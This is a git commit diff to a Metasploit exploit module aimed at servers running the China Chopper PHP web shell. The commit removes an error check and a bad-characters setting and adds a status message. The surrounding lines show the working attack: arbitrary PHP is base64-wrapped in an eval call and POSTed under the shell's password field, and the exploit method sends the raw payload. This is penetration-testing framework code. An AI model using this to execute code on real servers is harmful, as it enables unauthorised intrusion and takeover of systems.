remove the fail_with because it's always triggering anyway

bug/bundler_fix
wchen-r7 2015-11-05 18:19:46 -06:00
parent 109e9b6b6e
commit 27be832c4c
1 changed files with 2 additions and 9 deletions

View File

@ -24,10 +24,6 @@ class Metasploit4 < Msf::Exploit::Remote
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html']
],
'Payload' =>
{
'BadChars' => '\x00'
},
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
@ -47,17 +43,13 @@ class Metasploit4 < Msf::Exploit::Remote
def http_send_command(code)
code = "eval(base64_decode(\"#{Rex::Text.encode_base64(code)}\"));"
res = send_request_cgi({
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => {
"#{datastore['PASSWORD']}" => code
}
})
unless res && res.code == 200
fail_with(Failure::Unknown, 'Failed to execute the code.')
end
res
end
def check
@ -71,6 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote
end
def exploit
print_status("#{peer} - Sending exploit...")
http_send_command(payload.raw)
end
end